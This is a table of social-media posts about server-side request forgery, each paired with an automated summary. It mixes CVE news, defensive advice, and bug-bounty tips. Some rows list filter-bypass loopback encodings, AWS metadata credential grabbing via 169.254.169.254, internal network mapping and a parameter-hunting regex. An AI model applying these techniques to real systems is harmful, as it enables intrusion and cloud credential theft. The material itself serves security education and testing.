| 542 | 2025-01-25 11:13:52 UTC | Belangrijke informatie over server-side request forgery kwetsbaarheid in microsoft purview: cve-2025-21385 https://t.co/SMmCXDhzNB #CVE-2025-21385 #Microsoft Purview #SSRF kwetsbaarheid #Cybersecurity #Informatiebeveiliging #Trending #Tech #Nieuws | The content discusses a significant server-side request forgery vulnerability in Microsoft Purview with the CVE-2025-21385 identifier. It emphasizes the importance of this vulnerability in terms of cybersecurity and information security. The post is trending in the tech news and highlights the need for attention to this issue. The link provided likely directs to more detailed information about the vulnerability. |
| 543 | 2025-01-25 11:13:51 UTC | Kritieke ssrf kwetsbaarheid in microsoft purview ontdekt: bescherm uw gegevens kwetsbaarheid Purview beveiliging -2025-21385 bescherming update | A critical SSRF vulnerability in Microsoft Purview has been discovered, emphasizing the importance of protecting data. The vulnerability is identified as CVE-2025-21385, highlighting the need for security updates to safeguard network data. This news is trending in the tech community, urging users to take necessary precautions to enhance Microsoft Purview security. |
| 544 | 2025-01-24 18:13:24 UTC | Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. | The article provides guidance on identifying and exploiting server-side request forgery (SSRF) vulnerabilities in an API. It offers insights into detecting and leveraging these vulnerabilities for potential exploitation. The focus is on understanding SSRF risks and how they can be manipulated to compromise server security. The article aims to educate readers on the significance of addressing SSRF vulnerabilities to enhance API security. It is recommended for those interested in API hacking and SSRF mitigation strategies. |
| 545 | 2025-01-24 01:04:24 UTC | Veeam Backup for Microsoft Azure の SSRF 脆弱性 CVE-2025-23082 が FIX直ちにパッチ適用を https://t.co/LfvchcrE5k Azure 向けの Veeam Backup に脆弱性とのことですご利用のチームは最新ビルドへのアップデートを お急ぎください #Cloud #CVE202523082 #SSRF #Veeam | Veeam Backup for Microsoft Azure has a SSRF vulnerability (CVE-2025-23082) that requires immediate patching. Users are advised to update to the latest build promptly to address this vulnerability. The vulnerability affects Veeam Backup for Azure, and users are urged to apply the patch quickly. #Cloud #CVE202523082 #SSRF #Veeam |
| 546 | 2025-01-23 04:58:54 UTC | SSRF 101! Don't let attackers turn your server into a proxy! Learn the basics of Server-Side Request Forgery and how to prevent it from happening to you! #SSRF #CyberSecurity #WebSecurity | The content emphasizes the importance of understanding Server-Side Request Forgery (SSRF) to prevent attackers from exploiting it to turn a server into a proxy. It encourages learning the basics of SSRF to enhance cybersecurity and web security. The post aims to raise awareness about SSRF risks and the measures to mitigate them. #SSRF #CyberSecurity #WebSecurity. |
| 547 | 2025-01-23 04:58:53 UTC | Warning! Server-Side Request Forgery (SSRF) attacks can trick your server into making unauthorized requests! Validate user input use whitelisting & monitor logs to stay safe! #SSRF #CyberSecurity #WebSecurity | The content warns about Server-Side Request Forgery (SSRF) attacks that manipulate servers into making unauthorized requests. To prevent SSRF attacks, it advises validating user input, implementing whitelisting, and monitoring logs. These measures enhance cybersecurity and web security. It emphasizes the importance of safeguarding servers against SSRF attacks by taking proactive security measures. |
| 548 | 2025-01-22 04:41:20 UTC | External Threat Landscape Management | Attack surface | Brand | Vulnerability | The content discusses the importance of managing the external threat landscape, focusing on areas such as attack surface, brand protection, and vulnerability management. It likely delves into strategies for identifying and mitigating potential threats to an organization's security and reputation. The link provided may offer further insights or resources related to this topic. |
| 549 | 2025-01-20 23:53:42 UTC | Day 15: XXE SSRF! Discovered how XXE can lead to SSRF allowing attackers to access internal systems or sensitive data. Always validate XML input and disable external entities! #BugBounty #XXE #SSRF #CyberSecurity #InfoSec https://t.co/UspwIegXyp | The content discusses the discovery of how XXE (XML External Entity) vulnerabilities can lead to SSRF (Server-Side Request Forgery), enabling attackers to access internal systems or sensitive data. It emphasizes the importance of validating XML input and disabling external entities to prevent such attacks. The post also includes hashtags related to Bug Bounty, XXE, SSRF, Cybersecurity, and InfoSec. |
| 550 | 2025-01-20 18:58:50 UTC | HAPPY BIRTHDAY BHAI 🤗💝 We miss you, You will live in our Hearts Forever 💞 My Best Love To You. ❤️ | The content is a birthday tribute to Sushant Singh Rajput, expressing love and remembrance. The message conveys heartfelt sentiments, stating "HAPPY BIRTHDAY BHAI @itsSSR 🤗💝 We miss you, You will live in our Hearts Forever 💞 My Best Love To You. ❤️" The post is shared in honor of Sushant Day, using hashtags #SushantSinghRajput and #SSRF, along with a link to an image. |
| 551 | 2025-01-20 18:46:36 UTC | Multiple Azure DevOps Vulnerabilities Let Inject CRLF Queries & Rebind DNS | Multiple vulnerabilities in Azure DevOps allow attackers to inject CRLF queries and rebind DNS. These vulnerabilities can potentially be exploited to compromise the security of Azure DevOps systems. It is crucial for users to be aware of these vulnerabilities and take necessary precautions to prevent unauthorized access and protect sensitive data. |
| 552 | 2025-01-18 23:48:42 UTC | : A Deep Dive into and Mitigations for and | The content explores Server-Side Request Forgery (SSRF) cyber risks for software and web developers, providing a deep dive into the topic. It emphasizes the importance of understanding SSRF vulnerabilities and offers mitigations to address these risks. The focus is on enhancing security measures to protect against SSRF attacks, aiming to assist developers in safeguarding their systems and applications. |
| 553 | 2025-01-18 23:48:40 UTC | : A Deep Dive into and Mitigations for and | The content discusses Server-Side Request Forgery (SSRF), highlighting cyber risks it poses to software and web developers. It delves into the importance of understanding and mitigating SSRF vulnerabilities to enhance security. The post provides insights and strategies for developers to secure their systems against SSRF attacks. It emphasizes the need for developers to be vigilant and proactive in addressing SSRF risks to protect their software and websites from potential exploitation. The content aims to raise awareness about SSRF vulnerabilities and offers guidance on how developers can safeguard their systems. |
| 554 | 2025-01-17 20:43:22 UTC | Remember: #SSRF isn't just about making HTTP calls! Think broader - SMTP enumeration Redis unauthorized access internal Kibana instances Jenkins panels. The internal network is full of sensitive services! #BugBounty #HackingTips #CyberSecurity | The content emphasizes that Server-Side Request Forgery (#SSRF) extends beyond HTTP calls to include SMTP enumeration, unauthorized access to Redis, internal Kibana instances, and Jenkins panels. It highlights the presence of sensitive services within internal networks, urging a broader perspective for identifying vulnerabilities. The post is tagged with #BugBounty, #HackingTips, and #CyberSecurity. |
| 555 | 2025-01-17 14:43:51 UTC | Advanced #SSRF tip: Use Time-Based Blind SSRF to map internal networks. Send requests to sequential IPs/ports and measure response times. Tools like SSRFmap can automate this process. #PenTesting #RedTeam #InfoSec | The content discusses using Time-Based Blind SSRF to map internal networks by sending requests to sequential IPs/ports and measuring response times. Tools like SSRFmap can automate this process, beneficial for penetration testing, red team activities, and information security. This advanced technique helps identify vulnerabilities and potential entry points in network security. |
| 556 | 2025-01-17 02:38:42 UTC | Defending against #SSRF in microservices? Network segmentation is crucial! Use service mesh policies strict egress controls and never trust traffic between services. Monitor inter-service communication patterns. #DevSecOps #Kubernetes #Security | To defend against Server-Side Request Forgery (#SSRF) in microservices, network segmentation is vital. Implement strict egress controls, service mesh policies, and avoid trusting traffic between services. Monitoring inter-service communication patterns is essential. Emphasizing DevSecOps practices, Kubernetes, and security measures can enhance protection against SSRF attacks in microservices architecture. |
| 557 | 2025-01-16 23:43:14 UTC | Discovered an #SSRF but facing restrictions? Try CRLF injection in HTTP headers race conditions in URL validation or DNS rebinding attacks. Sometimes the initial SSRF is just the start! #BugBounty #HackingTips #WebSecurity | The content discusses strategies to overcome restrictions when facing a Server-Side Request Forgery (SSRF) vulnerability. It suggests using techniques like CRLF injection in HTTP headers, exploiting race conditions in URL validation, or conducting DNS rebinding attacks. It emphasizes that an SSRF issue can be just the beginning of a larger security threat. The post also includes hashtags related to bug bounty programs, hacking tips, and web security. |
| 558 | 2025-01-16 17:43:54 UTC | Hunting for #SSRF in modern web apps? Check GraphQL introspection endpoints PDF generators webhook configurations and image proxy functionality. These features often process user-supplied URLs! #BugBountyTips #WebHacking | The content highlights hunting for Server-Side Request Forgery (#SSRF) in modern web apps by checking GraphQL introspection endpoints, PDF generators, webhook configurations, and image proxy functionality. These features frequently handle user-supplied URLs, making them potential targets for SSRF vulnerabilities. The post also includes hashtags like #BugBountyTips and #WebHacking, indicating it is aimed at security researchers or bug bounty hunters. It suggests focusing on these specific areas to identify and potentially exploit SSRF vulnerabilities in web applications. |
| 559 | 2025-01-16 14:38:28 UTC | Critical #SSRF via AWS IMDSv1: If you can hit 169.254.169.254 you might grab IAM creds & own the cloud infrastructure. Always enforce IMDSv2 with required HTTP PUT header token! #CloudSecurity #AWS #AWSecurity | The content warns about a critical Server-Side Request Forgery (SSRF) vulnerability via AWS IMDSv1, allowing attackers to access IAM credentials and compromise cloud infrastructure by targeting 169.254.169.254. To mitigate this risk, it is advised to enforce IMDSv2 with a required HTTP PUT header token. This emphasizes the importance of implementing proper security measures, especially in cloud environments like AWS, to prevent unauthorized access and protect sensitive information. #CloudSecurity #AWS #AWSecurity. |
| 560 | 2025-01-16 12:02:53 UTC | Veeam Azure Backup Vulnerability Allows Attackers to Utilize SSRF & Send Unauthorized Requests | A vulnerability in Veeam Azure Backup enables attackers to exploit Server-Side Request Forgery (SSRF) to send unauthorized requests. This vulnerability poses a security risk as it allows attackers to manipulate requests and potentially access unauthorized data or services. It is crucial for users of Veeam Azure Backup to be aware of this vulnerability and take necessary precautions to mitigate the risk of unauthorized access and data breaches. |
| 561 | 2025-01-16 07:38:34 UTC | Understanding #SSRF defense in depth: Input validation isn't enough! Implement allowlists DNS resolution controls egress filtering and disable unused URL schemas. Remember: 302 redirects can bypass simple hostname checks. #AppSec #SecurityEngineering | The content emphasizes the importance of a comprehensive defense strategy against Server-Side Request Forgery (SSRF). It highlights that relying solely on input validation is insufficient. Suggestions include implementing allowlists, DNS resolution controls, egress filtering, and disabling unused URL schemas to enhance security. Additionally, it warns that 302 redirects can circumvent basic hostname checks. The post underscores the significance of a multi-layered approach to SSRF defense to bolster application security. |
| 562 | 2025-01-16 01:34:03 UTC | Pro tip: When testing for #SSRF don't just try localhost/127.0.0.1. Remember IPv6 (::1) decimal notation (2130706433) octal format (0177.0.0.1) and domain shortcuts (127.1). Cloud metadata endpoints are gold! #HackingTips #CloudSecurity | The content provides a tip for testing Server-Side Request Forgery (SSRF) vulnerabilities by exploring various formats beyond localhost/127.0.0.1, including IPv6 (::1), decimal notation (2130706433), octal format (0177.0.0.1), and domain shortcuts (127.1). It emphasizes the importance of considering cloud metadata endpoints for potential exploitation. The post also includes hashtags related to hacking tips and cloud security. |
| 563 | 2025-01-15 18:38:30 UTC | Blind #SSRF vulnerabilities can be detected by monitoring response times & using out-of-band techniques like DNS/HTTP callbacks. Set up a Burp Collaborator or interactsh server to catch those internal network calls. #InfoSec #BugBounty #WebSecurity | Blind SSRF vulnerabilities can be identified by monitoring response times and utilizing out-of-band techniques like DNS/HTTP callbacks. Setting up a Burp Collaborator or interactsh server can help capture internal network calls. This approach enhances information security, aids in bug bounty programs, and strengthens web security measures. |
| 564 | 2025-01-15 18:38:29 UTC | Our October webinar, "Find & Fix: How Common Code Flaws Let Hackers In, &How You Keep Them Out" is now available on-demand! | The October webinar titled "Find & Fix: How Common Code Flaws Let Hackers In, & How You Keep Them Out" is now available on-demand. The webinar focuses on cybersecurity, web application security, SSRF, AppSec, code flaws, vulnerability management, and security testing. It provides insights on identifying and addressing common code vulnerabilities to enhance security measures. The webinar aims to educate viewers on preventing hackers from exploiting code flaws. Viewers can access the webinar at the provided link. #Cybersecurity #Webinar #SecurityTesting #CodeFlaws #VulnerabilityManagement |
| 565 | 2025-01-15 18:38:28 UTC | Looking for ways to escalate: Potential for internal resource access or DNS exfiltration? Any creative payload ideas or exploitation techniques? DM or reply with insights! #BugBounty #SSRF #Infosec #EthicalHacking 2/N | The content is seeking ways to escalate by exploring potential for internal resource access or DNS exfiltration. It asks for creative payload ideas or exploitation techniques related to Bug Bounty, SSRF, Infosec, and Ethical Hacking. The invitation is to share insights via direct message or reply. The focus is on finding vulnerabilities and enhancing security measures. |
| 566 | 2025-01-14 06:28:14 UTC | On this day Jan 14th 1942 we remember the Special Operations Executive (SOE) who executed Operation Postmaster. A daring mission where the primary targets was the Italian merchant ship Duchessa d'Aosta and the German tug Likomba. #ww2 #soe #ssrf #Postmaster https://t.co/Usp9xsvKCO | On January 14th, 1942, the Special Operations Executive (SOE) conducted Operation Postmaster, targeting the Italian merchant ship Duchessa d'Aosta and the German tug Likomba during World War II. This daring mission is remembered on this day. The SOE's actions are commemorated with hashtags like #ww2, #soe, #ssrf, and #Postmaster. |
| 567 | 2025-01-12 18:28:54 UTC | Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search Regex \?.=(\/\/?\w|\w\/|\w(%3A|:)(\/|%2F)|%2F|[\.\w]\.\w{24}[\w]) And find potentially vulnerable SSRF params - https://t.co/6cfBPVn0FM #SSRF #cybersec https://t.co/ipnHHHaID4 | The content discusses a method using Burp Search Regex to identify parameters vulnerable to LFI, Path Traversal, SSRF, and Open Redirect. The provided regex pattern helps in finding potentially vulnerable SSRF parameters. The focus is on cybersecurity, specifically SSRF vulnerabilities. The content includes a link for further reference. |
| 568 | 2025-01-09 09:18:17 UTC | Automated SSRF Detection! #BugBounty #SSRF #Regex #bugbountytips #burpsuite Prepare for success: 1 Use a DNS log platform (e.g. Burp Collaborator or https://t.co/UiHRbhDCC8). 2 Ready these regex patterns: | The content discusses automated SSRF detection for bug bounty programs, emphasizing the use of a DNS log platform like Burp Collaborator and specific regex patterns. It suggests preparing for success by utilizing these tools and resources to enhance SSRF vulnerability detection. The post also includes relevant hashtags and a link to regex patterns for reference. |
| 569 | 2025-01-08 13:13:34 UTC | 403 Bypass list by @jhaddix Url Manipulation Methods Top 77 ways to bypass access control #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #ssrf #AEM https://t.co/WWzARH89rF | The content discusses a list of 77 URL manipulation methods to bypass access control, shared by @jhaddix. It is related to bug bounty tips, ethical hacking, cybersecurity, pentesting, SQL injection (SQLi), cross-site scripting (XSS), cybersecurity awareness, server-side request forgery (SSRF), and Adobe Experience Manager (AEM). The link provided leads to more detailed information on these methods. |
| 570 | 2025-01-08 10:13:12 UTC | 🎯 **Find SSRF Bypass, Cloudflare & AWS Metadata!** | The content discusses finding Server-Side Request Forgery (SSRF) bypass methods, accessing Cloudflare and AWS metadata. The author, AnonTriager, shares insights on cybersecurity, bug bounty hunting, and provides additional tips. The content includes links for further reading. Key topics covered are SSRF, Cloudflare, AWS, cybersecurity, and bug bounty programs. |
| 571 | 2025-01-07 04:03:48 UTC | — Houssam Miliani (@0day_dz) | The content appears to be a tweet by a user named Houssam Miliani (@0day_dz) mentioning #ssrf and sharing a link. The link provided seems to redirect to another website. The tweet may be related to a topic or discussion about Server-Side Request Forgery (SSRF) based on the hashtag used. |
| 572 | 2025-01-06 17:58:35 UTC | Step 5: Test SSRF Surf: surf -l ssrf.txt -t 10 -c 200 SSRF Finder: cat ssrf.txt | Step 5 involves testing SSRF Surf using the command "surf -l ssrf.txt -t 10 -c 200" and checking the results with "SSRF Finder: cat ssrf.txt". This step is part of a process to identify and address Server-Side Request Forgery (SSRF) vulnerabilities. The provided link may contain additional information related to this process. |
| 573 | 2025-01-06 10:58:46 UTC | Escalating HTML to SSRF Check out how HTML injection leads to SSRF. Fast testing = HOF in 5 minutes! Learn more: https://t.co/1vrLROS3zh Written by cyber_catz. #BugBounty #Infosec #CyberSecurity #SSRF #Hacking | The content discusses escalating HTML injection to Server-Side Request Forgery (SSRF) and how it can be tested quickly for potential vulnerabilities. The article is written by cyber_catz and provides a link for further information. It highlights the connection between HTML injection and SSRF, emphasizing the importance of fast testing. The post is relevant to Bug Bounty, Infosec, Cybersecurity, SSRF, and Hacking. |
| 574 | 2025-01-05 07:58:04 UTC | SSRF | The content is about Server-Side Request Forgery (SSRF) in web hacking and penetration testing. It includes a video link for more information on SSRF and related topics like web fundamentals, cybersecurity, ethical hacking, and bug bounty tips. The content is in Tamil and is part of a tutorial series on TryHackMe, covering web application security, penetration testing, and CTF challenges. The link provided directs to additional resources on SSRF and its implications in information security and web application security testing. |
| 575 | 2025-01-04 09:48:53 UTC | Vulnerabilidades XXE (XML eXternal Entity injection) y contramedidas | The content discusses XXE (XML eXternal Entity) injection vulnerabilities and countermeasures. It highlights the importance of protecting against XML external entity injections to prevent security breaches. The post likely provides insights into how these vulnerabilities can be exploited and offers strategies or tools to mitigate the risks associated with XXE attacks. It also mentions the relevance of SSRF (Server-Side Request Forgery) in this context. |
| 576 | 2025-01-03 14:48:16 UTC | What is an SSRF attack...and why do we care? 🤔 | The content discusses SSRF attacks, explaining what they are, how to identify them, and the importance of trust relationships in preventing them. It provides a video link for further details on SSRF attacks, vulnerability, secure coding, and application security. The focus is on understanding SSRF attacks and their significance in maintaining secure systems. |
| 577 | 2025-01-02 09:11:40 UTC | Invoice Ninja suffers from a Server-Side Request Forgery flaw | Invoice Ninja has been identified as having a Server-Side Request Forgery vulnerability. This flaw could potentially allow attackers to manipulate server requests, leading to unauthorized access or data leakage. It is crucial for users of Invoice Ninja to be aware of this security issue and take necessary precautions to mitigate the risk of exploitation. |
| 578 | 2025-01-01 10:43:34 UTC | Server-Side Request Forgery - Simple Illustration | The content discusses Server-Side Request Forgery (SSRF) through a simple illustration. It is shared by @hackhunting and includes hashtags like #ssrf, #bugbountytips, and #webapplicationsecurity. The post likely provides insights or tips related to identifying and addressing SSRF vulnerabilities in web applications. |
| 579 | 2024-12-31 04:01:01 UTC | GitHub - hackerassociate/SSRF-Hacks-IP-Decimal: A Burp Suite extension that converts IP addresses to decimal notation, useful for SSRF bypass and WAF evasion testing. Created by Harshad Shah. | The content discusses a Burp Suite extension named "SSRF-Hacks-IP-Decimal" created by Harshad Shah. This tool converts IP addresses to decimal notation, aiding in SSRF bypass and WAF evasion testing. It is available on GitHub under the hackerassociate repository. The extension is designed to assist in security testing by converting IP addresses for specific testing scenarios. |
| 580 | 2024-12-30 13:33:28 UTC | Exploring vulnerabilities? This Cloud Metadata Dictionary by is a must-have! | The Cloud Metadata Dictionary by @Jhaddix is recommended for exploring SSRF vulnerabilities and testing metadata services in cloud environments. It is considered a valuable resource for cybersecurity professionals and bug bounty hunters. The dictionary can aid in identifying and addressing security issues related to cloud metadata services. The post emphasizes the importance of this tool in enhancing cybersecurity practices and staying vigilant against potential vulnerabilities. |
| 581 | 2024-12-27 11:28:37 UTC | . No. 62 Commando or the Small Scale Raiding Force was a British Commando unit during WW2 under the command of SOE. #62Commando #SSRF #SOE #WW2 More information: https://t.co/yAueGaZ3yw https://t.co/ITC7O7Flmt | No. 62 Commando, also known as the Small Scale Raiding Force, was a British Commando unit in WW2 under SOE command. It played a significant role during the war. For more information, visit the provided links. #62Commando #SSRF #SOE #WW2 🇬🇧 |
| 582 | 2024-12-26 17:18:46 UTC | :) | The content consists of a link and a hashtag related to SSRF (Server-Side Request Forgery). The link provided may lead to more information about SSRF. The use of the smiley face emoticon in the title and the hashtag suggests a positive or light-hearted tone. The content also includes a shortened link that redirects to an external source, possibly for further reading or resources on SSRF. |
| 583 | 2024-12-16 23:49:17 UTC | socalledhacker: Read SSRF: Blacklist and Whitelist-Based Input Filters by Neetrox on Medium: #bugbountytips #bugbounty #bugbountytip #bughunting #hacking #SSRF #infosec #cybersecurity #security | The content is a tweet promoting an article on Medium titled "SSRF: Blacklist and Whitelist-Based Input Filters" by Neetrox. The article likely discusses strategies for preventing Server-Side Request Forgery (SSRF) attacks using input filters. The tweet includes hashtags related to bug bounty tips, hacking, cybersecurity, and security. The tweet is shared by the user socalledhacker. |
| 584 | 2024-12-16 12:43:45 UTC | socalledhacker: Don't want to use Burpsuite collaborator for SSRF hunting... Check this out an amazing replacement of collaborator:- #bugbounty #bug #bugbountytip #bugbountytips @cybersecurity #infosec #SSRF | The content shared by socalledhacker discusses an alternative to using Burpsuite collaborator for SSRF hunting. The post highlights a replacement tool and encourages users to explore it. The hashtags used indicate the focus on bug bounty, cybersecurity, infosec, and SSRF. The post is shared on Twitter by socalledhacker. |
| 585 | 2024-12-14 07:28:31 UTC | ImShaadab: Just wrapped up the SSRF room on @RealTryHackMe! Turns out servers will believe anything you tell them if you phrase it right Always validate your inputs folks! #TryHackMe #SSRF #CyberSecurity | ImShaadab completed the SSRF room on TryHackMe, highlighting that servers can be tricked if inputs are not validated properly. The importance of validating inputs in cybersecurity is emphasized. #TryHackMe #SSRF #CyberSecurity |
| 586 | 2024-12-13 18:33:31 UTC | @st3am3dric31: Wrote a beginners guide to testing a web app for Server Side Request Forgery vulnerabilities #ssrf #webhacking #bugbounty #oswa | @st3am3dric31 shared a beginner's guide on testing web apps for Server Side Request Forgery (SSRF) vulnerabilities. The guide focuses on #ssrf, #webhacking, #bugbounty, and #oswa. It can be found on Twitter at the provided link. |
| 587 | 2024-12-11 09:18:44 UTC | omvapt: #SAP fixed critical #SSRF #Vulnerabilities #flaw in #NetWeavers #Adobe_Document Services | SAP addressed critical SSRF vulnerabilities in NetWeaver's Adobe Document Services, as reported by omvapt on Twitter. The flaws were fixed to enhance security and prevent potential exploitation. |
| 588 | 2024-12-10 16:02:14 UTC | SAP fixed critical SSRF flaw in NetWeaver NetWeaver | SAP addressed a critical Server-Side Request Forgery (SSRF) vulnerability in NetWeaver, a popular software platform. The flaw could potentially allow attackers to manipulate server requests and access sensitive information. SAP released a fix to address this security issue, aiming to prevent unauthorized access and protect the integrity of NetWeaver systems. It is crucial for users to promptly apply the patch to safeguard their systems from potential exploitation. |
| 589 | 2024-12-10 15:02:45 UTC | SAP NetWeaver Vulnerabilities Let Attackers Upload Malicious PDF Files | The content discusses vulnerabilities in SAP NetWeaver that allow attackers to upload malicious PDF files. These vulnerabilities pose a security risk as attackers can exploit them to compromise systems. Organizations using SAP NetWeaver should be aware of these vulnerabilities and take necessary precautions to protect their systems from potential attacks involving malicious PDF files. Regular security updates and patches should be applied to mitigate the risk of exploitation. |
| 590 | 2024-12-10 15:02:42 UTC | SAP Patches Critical Vulnerability in NetWeaver | SAP has addressed a critical vulnerability in its NetWeaver platform through patches. The vulnerability posed a significant security risk, prompting the need for immediate action to protect systems using NetWeaver. By releasing these patches, SAP aims to enhance the security of its software and prevent potential exploitation of the vulnerability by malicious actors. This highlights the importance of timely updates and security measures to safeguard sensitive data and systems from cyber threats. |
| 591 | 2024-12-10 09:18:28 UTC | JayateerthaG: [New Blog Alert - ] #bugbounty #bugbountytips #hackers #blog #ssrf #lfi #vulnerability #zoho #jayateerthag #infosec #security | JayateerthaG has a new blog post alert related to bug bounty tips, hackers, SSRF, LFI, Zoho, infosec, and security. The tweet provides a link to the blog post. |
| 592 | 2024-12-08 20:13:27 UTC | @evert_eriksson: No tree is complete without a few ribs! #ssrf #cwis @_johnedwards @sawhitbe @CWISociety @dotu3535 | The tweet by @evert_eriksson emphasizes that no tree is complete without a few ribs, accompanied by hashtags #ssrf and #cwis. The tweet mentions @_johnedwards, @sawhitbe, @CWISociety, and @dotu3535. The content can be found on Twitter at the specified link. |
| 593 | 2024-12-08 20:13:26 UTC | @DanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrf | The content shared by @DanaEpp on Twitter highlights an article focusing on identifying and exploiting server-side request forgery (SSRF) vulnerabilities within an API. The post encourages readers to explore the article for insights into API hacking and SSRF. The link provided directs users to the source for further information on this topic. |
| 594 | 2024-12-08 06:13:18 UTC | @pentesttesting: I just published Server-Side Request Forgery (SSRF) in Laravel: Understanding and Mitigation #LaravelSecurity #CyberSecurity #WebSecurity #SSRF #LaravelTips #PenetrationTesting #VulnerabilityAssessment #WebsiteSecurity #EthicalHacking #CyberAwareness | The content shared on Twitter discusses Server-Side Request Forgery (SSRF) in Laravel, focusing on understanding and mitigation strategies. It touches on topics like Laravel security, cybersecurity, web security, SSRF, penetration testing, vulnerability assessment, website security, ethical hacking, and cyber awareness. The link provided likely leads to a detailed article or guide on SSRF in Laravel. |
| 595 | 2024-12-06 17:04:34 UTC | @KahuLabs_: Case Study Alert! Our team at Kahu Labs recently uncovered a critical SSRF vulnerability that escalated into XSS in a clients web app. This flaw bypassed WAF protections allowing malicious SVG files to be loaded and executed. Heres how it happened #CyberSecurity #SSRF | Kahu Labs discovered a serious SSRF vulnerability that led to XSS in a client's web app, bypassing WAF protections. Malicious SVG files could be loaded and executed. The case study highlights the vulnerability escalation and the impact on cybersecurity. #CyberSecurity #SSRF. |
| 596 | 2024-12-05 13:58:56 UTC | ReneRobichaud: ChatGPT Next Web Vulnerability Let Attackers Exploit Endpoint to Perform SSRF #Infosec #Security #Cybersecurity #CeptBiro #ChatGPT #NextWeb #Vulnerability #Exploit #Endpoint #SSRF | The content discusses a vulnerability in ChatGPT Next Web discovered by ReneRobichaud, allowing attackers to exploit endpoints for Server-Side Request Forgery (SSRF). The post highlights the importance of cybersecurity and provides hashtags related to information security. The vulnerability could potentially be used by attackers to manipulate the endpoint and perform SSRF attacks. The link provided leads to a tweet by ReneRobichaud discussing this issue. |
| 597 | 2024-12-05 13:58:55 UTC | CeptBiro: ChatGPT Next Web Vulnerability Let Attackers Exploit Endpoint to Perform SSRF #Infosec #Security #Cybersecurity #CeptBiro #ChatGPT #NextWeb #Vulnerability #Exploit #Endpoint #SSRF | The content discusses a vulnerability in ChatGPT Next Web, allowing attackers to exploit endpoints for Server-Side Request Forgery (SSRF). CeptBiro shared this information on Twitter, emphasizing the importance of cybersecurity and the need to address this vulnerability to prevent potential attacks. The post includes relevant hashtags such as #Infosec, #Security, and #Cybersecurity to raise awareness about the issue. |
| 598 | 2024-12-05 12:31:58 UTC | ChatGPT Next Web vulnerability Let Attackers exploit endpoint to Perform SSRF | The ChatGPT Next Web vulnerability allows attackers to exploit an endpoint for Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially be used by malicious actors to manipulate the server into making unauthorized requests on their behalf. It poses a security risk by enabling attackers to abuse the system through SSRF, a technique that can lead to data breaches or unauthorized access. It is crucial for system administrators and developers to address this vulnerability promptly to prevent exploitation and protect sensitive data. |
| 599 | 2024-12-02 18:48:34 UTC | CWISociety: New #CWISmemberresearch by #CWISmember Dr Hon Lok (David) Lo team regarding minimally invasive #SSRF techniques! Read more below: | Dr. Hon Lok (David) Lo and his team, members of CWISociety, have conducted new research on minimally invasive SSRF techniques. The details of their research can be found on the CWISociety Twitter page. |
| 600 | 2024-11-29 01:33:48 UTC | iototsecnews: Wget の脆弱性 CVE-2024-10524 が FIX短縮 URL による SSRF 攻撃の可能性 #GNU #JFrog #OpenSource #SSRF #Vulnerability #wget | The content discusses a vulnerability (CVE-2024-10524) in Wget that could lead to SSRF attacks via shortened URLs. The post highlights the potential risk and mentions relevant hashtags like #GNU, #JFrog, #OpenSource, #SSRF, #Vulnerability, and #wget. The source of the information is a tweet from iototsecnews. |
| 601 | 2024-11-28 02:28:25 UTC | salecharohit: Enhance AWS security by enforcing IMDSv2 with Open Policy Agent (OPA) in Terraform! Protect your instance metadata and reduce unauthorized access risks through #SSRF Learn more: #AWS #OpenPolicyAgent #CloudSecurity #IMDSv2 | The content discusses enhancing AWS security by enforcing IMDSv2 with Open Policy Agent (OPA) in Terraform to protect instance metadata and reduce unauthorized access risks, particularly against Server-Side Request Forgery (SSRF) attacks. The post encourages learning more about this security measure through the provided link. The focus is on utilizing IMDSv2, OPA, and Terraform to bolster AWS security and safeguard against potential vulnerabilities. The hashtags used include #AWS, #OpenPolicyAgent, #CloudSecurity, and #IMDSv2. |
| 602 | 2024-11-27 08:28:15 UTC | InfoSecComm: New Writeup Alert! "SSRF To Internal Data Access Via PDF Print Feature" by Bishal Shrestha is now live on IW! Check it out here: #ssrf #bugbounty #informationsecurity | A new writeup titled "SSRF To Internal Data Access Via PDF Print Feature" by Bishal Shrestha is now available on InfoSecComm. The content discusses a security vulnerability related to SSRF that allows access to internal data through the PDF print feature. The post is live on IW and can be viewed using the provided link. It covers topics related to #ssrf, #bugbounty, and #informationsecurity. |
| 603 | 2024-11-26 01:18:48 UTC | @bishal0x01: My first-ever SSRF report to Internal Data Access. Feel free to share any feedback! Thanks to @dhungana_bibek7 @tnirmalz for proofreading! #bugbounty #ssrf | The content is a tweet by user @bishal0x01 sharing their first SSRF report on Internal Data Access. They invite feedback and credit @dhungana_bibek7 and @tnirmalz for proofreading. The tweet includes hashtags #bugbounty and #ssrf. The tweet can be found at https://twitter.com/bishal0x01/status/1861088498033275039. |
| 604 | 2024-11-24 21:18:50 UTC | @puntopcap: Vulnerabilidad SSRF (Server Side Request Forgery) OWASP API7:2023 - Un peligro creciente para las APIs #SSRF #Ciberseguridad #OWASP #APISecurity #SeguridadEnAPIs | The content discusses the vulnerability SSRF (Server Side Request Forgery) as outlined in OWASP API7:2023, highlighting it as a growing danger for APIs. The tweet emphasizes the importance of addressing this security risk in the context of API security and cybersecurity. The link provided leads to further information on the topic. |
| 605 | 2024-11-20 04:04:27 UTC | VulnVanguard: The Wget Gambit: CVE-2024-10524 allows SSRF attacks via shorthand URLs exposing internal servers & data. Patch Wget to 1.25.0 sanitize inputs & avoid shorthand URLs. Dont let Wget become a backdooract now! #Cybersecurity #Wget #SSRF #PatchNow | The content warns about CVE-2024-10524 enabling SSRF attacks through shorthand URLs, risking internal server exposure. It advises patching Wget to version 1.25.0, sanitizing inputs, and avoiding shorthand URLs to prevent exploitation. Urging immediate action to prevent Wget from becoming a backdoor, the message emphasizes cybersecurity awareness and the importance of patching vulnerabilities promptly. #Cybersecurity #Wget #SSRF #PatchNow. |
